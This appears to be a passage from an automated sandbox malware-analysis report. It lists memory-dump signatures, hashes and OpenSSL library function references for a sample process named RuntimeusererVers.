                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: X_iv_length
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\record\ssl3_record_tls13.c$M
                                                                                                                                                                                                                                          • API String ID: 507009519-1371881060
                                                                                                                                                                                                                                          • Opcode ID: cbbd41ce0271423c3d369916ae0a8edbf8c7d68b7c4bdce82aecd0230584fbc8
                                                                                                                                                                                                                                          • Instruction ID: cceb5b907ccda5057629b00840de45dc0fc524de87a25510dbde7e024ec837e5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cbbd41ce0271423c3d369916ae0a8edbf8c7d68b7c4bdce82aecd0230584fbc8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 85E1ADA2B09A828AEF208F65E4407BE77A1FB45BE8F044235DE4D57A89DF3CE555C700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: L_cleanse$O_free$D_lock_newO_mallocO_strdupO_strndupX509_chain_up_refX509_up_ref_time64memcpy
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\statem\extensions_srvr.c$D:\a\1\s\ssl\packet_local.h
                                                                                                                                                                                                                                          • API String ID: 2801444773-2178723975
                                                                                                                                                                                                                                          • Opcode ID: c0126a933966b586eb01444f1caf48306036ef3bd94800007dc601cda98a503f
                                                                                                                                                                                                                                          • Instruction ID: ba3c4878e7c02a4353440d886f9f313d59943a5fe85668254f10be5374ca265e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c0126a933966b586eb01444f1caf48306036ef3bd94800007dc601cda98a503f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2F12C172A08A9285EB608B65E4447BE77A0FB84BE4F055235EE8D47B99DF7CF540CB00
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_free$D_sizeDigestO_mallocP_sha256_time64
                                                                                                                                                                                                                                          • String ID: &$..\s\ssl\statem\statem_clnt.c$resumption
                                                                                                                                                                                                                                          • API String ID: 1034084170-1441847574
                                                                                                                                                                                                                                          • Opcode ID: ccdf85ddf26547665e31e6571dd1f93e08b7acb0ad1d4dc524410b283e9881f3
                                                                                                                                                                                                                                          • Instruction ID: 6129ef9921b538e76aa378fdc2ec4ce165de827055e4dc6d62ce6b437d750bcb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ccdf85ddf26547665e31e6571dd1f93e08b7acb0ad1d4dc524410b283e9881f3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4DF1A172A08A8185EB208B15E4447BEB7A1FB84BE4F048275EB8D47795CF7DF992C700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_clear_free$Y_free$L_cleanseO_free$N_bn2binN_num_bits
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\statem\statem_clnt.c
                                                                                                                                                                                                                                          • API String ID: 407376196-1507966698
                                                                                                                                                                                                                                          • Opcode ID: bfe347ec57a691a3ff231926510988ec0a0bcc62f942f8fba7933f7892b3e20a
                                                                                                                                                                                                                                          • Instruction ID: f39a8792124ca5f864d746f0db44a0219bc103db64689e2b873ffb0a017fba23
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bfe347ec57a691a3ff231926510988ec0a0bcc62f942f8fba7933f7892b3e20a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48B15972A08E8281FE649A12D594BBA6691FF85BE4F084235EE4D4BB95DF3CF542C700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_clear_free$memcpy$L_cleanseO_mallocmemset
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\s3_lib.c
                                                                                                                                                                                                                                          • API String ID: 2649524955-4238427508
                                                                                                                                                                                                                                          • Opcode ID: c8176c414889550db18000435abb5a1deba6356550613b413f080dcc09cb8534
                                                                                                                                                                                                                                          • Instruction ID: 8d0ab7ec818807d9cafe6d7136b0b4c017fd73a25763beb6f7886317452cc0bf
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c8176c414889550db18000435abb5a1deba6356550613b413f080dcc09cb8534
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 24519C72709B8692EE548F16E440AAAB7A0FB84BD4F044232EE8D47765CF3CE562C710
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_mem_ctrl$L_sk_newL_sk_pushL_sk_sortO_mallocP_get_nameP_get_typeP_zlib
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\ssl_ciph.c
                                                                                                                                                                                                                                          • API String ID: 680475741-1847046956
                                                                                                                                                                                                                                          • Opcode ID: 62ee42c7a7c76134d40cdec2259d5c75cc418fa19301ec1af2a8b91bded5920c
                                                                                                                                                                                                                                          • Instruction ID: 0d6859ff570aea8e76b6fd75f6b006633ea7ae2c51d586e93035e9d10b0eb724
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 62ee42c7a7c76134d40cdec2259d5c75cc418fa19301ec1af2a8b91bded5920c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 84111560E08E0681FE48AB62E8197B86395BF947E5F440235FA0D07BD3EE6CFC428201
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • BN_bin2bn.LIBCRYPTO-1_1(?,?,00000000,00000000,?,..\s\ssl\statem\statem_clnt.c,00007FF81E0CE15A), ref: 00007FF81E0D03D7
                                                                                                                                                                                                                                          • BN_bin2bn.LIBCRYPTO-1_1(?,?,00000000,00000000,?,..\s\ssl\statem\statem_clnt.c,00007FF81E0CE15A), ref: 00007FF81E0D03EB
                                                                                                                                                                                                                                          • BN_free.LIBCRYPTO-1_1(?,?,00000000,00000000,?,..\s\ssl\statem\statem_clnt.c,00007FF81E0CE15A), ref: 00007FF81E0D05A8
                                                                                                                                                                                                                                          • BN_free.LIBCRYPTO-1_1(?,?,00000000,00000000,?,..\s\ssl\statem\statem_clnt.c,00007FF81E0CE15A), ref: 00007FF81E0D05B0
                                                                                                                                                                                                                                          • BN_free.LIBCRYPTO-1_1(?,?,00000000,00000000,?,..\s\ssl\statem\statem_clnt.c,00007FF81E0CE15A), ref: 00007FF81E0D05B8
                                                                                                                                                                                                                                          • DH_free.LIBCRYPTO-1_1(?,?,00000000,00000000,?,..\s\ssl\statem\statem_clnt.c,00007FF81E0CE15A), ref: 00007FF81E0D05C0
                                                                                                                                                                                                                                          • EVP_PKEY_free.LIBCRYPTO-1_1(?,?,00000000,00000000,?,..\s\ssl\statem\statem_clnt.c,00007FF81E0CE15A), ref: 00007FF81E0D05C8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: N_free$N_bin2bn$H_freeY_free
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\statem\statem_clnt.c
                                                                                                                                                                                                                                          • API String ID: 2982095754-1507966698
                                                                                                                                                                                                                                          • Opcode ID: 2a12ea7c95104e32635f3a9105b02c5bb099e863f7de12298ca0f2c235696508
                                                                                                                                                                                                                                          • Instruction ID: 2773057a7b9829caf99ea5e3c1c6ebe0ac8f1c49c1017e6e6a450c39109fb1d3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a12ea7c95104e32635f3a9105b02c5bb099e863f7de12298ca0f2c235696508
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2791D862A08BC146EB60DB25A5107BB6791FB857D4F449231EECD17B86DF3CF9918B00
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Y_derive$O_clear_freeO_mallocX_freeX_newY_derive_initY_derive_set_peer
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\s3_lib.c
                                                                                                                                                                                                                                          • API String ID: 2104848214-4238427508
                                                                                                                                                                                                                                          • Opcode ID: d3680417821579d0338fd1fd2f233541748ef9b257303e3de83b838f041bea5a
                                                                                                                                                                                                                                          • Instruction ID: 754d7e24a6c8dcaa86a605eb6b10e6f9d5bf469fa9a78909bb9c625428e7c4ac
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d3680417821579d0338fd1fd2f233541748ef9b257303e3de83b838f041bea5a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1351A072B08B4282FF249E22A5406BAA791BF84BE4F444235EE4D47B95DF3CF956C740
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: R_put_error$O_free
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\ssl_lib.c
                                                                                                                                                                                                                                          • API String ID: 3616133153-1080266419
                                                                                                                                                                                                                                          • Opcode ID: 444372937c9b3ce212e059ec336aa4510f7d10820877fde32f7dd1670c1c857f
                                                                                                                                                                                                                                          • Instruction ID: e2d58511bd2aeec1144256d1dcbcb773bc4505f62576d4032857318e7d1a7cde
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 444372937c9b3ce212e059ec336aa4510f7d10820877fde32f7dd1670c1c857f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CF513B72A08E8681EB50DF21D8407AD73A4FB84FA8F484235DA5C4B799DF38E485CB20
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: D_unlockD_write_lockH_deleteH_retrieveO_clear_flagsO_freeO_set_flagsO_snprintfR_add_error_datamemcpy
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\record\rec_layer_d1.c$SSL alert number
                                                                                                                                                                                                                                          • API String ID: 928870745-720991377
                                                                                                                                                                                                                                          • Opcode ID: b0756a720c7ca681a88f9697d71b761ad4d16e9e5fe397f34a13d788fcf6975e
                                                                                                                                                                                                                                          • Instruction ID: 511c400b56d0e07a2523ba9632d3f831c7c9dacebc337ca00baeb7252cc839ce
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b0756a720c7ca681a88f9697d71b761ad4d16e9e5fe397f34a13d788fcf6975e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66125132E08A4285EFA49F259414BBA27E1FB44BE8F184236DE4D46A89DF7DF4C58710
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_zalloc$J_nid2snP_get_digestbyname
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\ssl_lib.c
                                                                                                                                                                                                                                          • API String ID: 4284552970-1080266419
                                                                                                                                                                                                                                          • Opcode ID: f6cc87e6b05e7f55d33cb5daac34941b4575cab0649bc418a77131c6fd7575bc
                                                                                                                                                                                                                                          • Instruction ID: 4ee9f8bd0d8f2c00e3427ebc904cb0bb9a9939360d8e5efba08cff5aef2af585
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f6cc87e6b05e7f55d33cb5daac34941b4575cab0649bc418a77131c6fd7575bc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C231A025A0CF9186FB25AB25E4507B9A7A1FB447E0F480235EE8D0779ACE7DF552C700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1581472246.00007FF81E4E0000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582460342.00007FF81E4E7000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582744405.00007FF81E4EC000.00000004.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582953118.00007FF81E4EE000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 313767242-0
                                                                                                                                                                                                                                          • Opcode ID: 7a4736268932c74a693b3e5a833589d54eed0b055916a83f70a1c8991e9e4dcb
                                                                                                                                                                                                                                          • Instruction ID: 34d3067d5c21a0f0589968fdc755dd18a63f153446563fc6c7f2724bd6d796a0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a4736268932c74a693b3e5a833589d54eed0b055916a83f70a1c8991e9e4dcb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 54311C72609E8285EB60DF60E8447FD7360FB847A4F44453ADA4D47A99DF3CE698C710
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
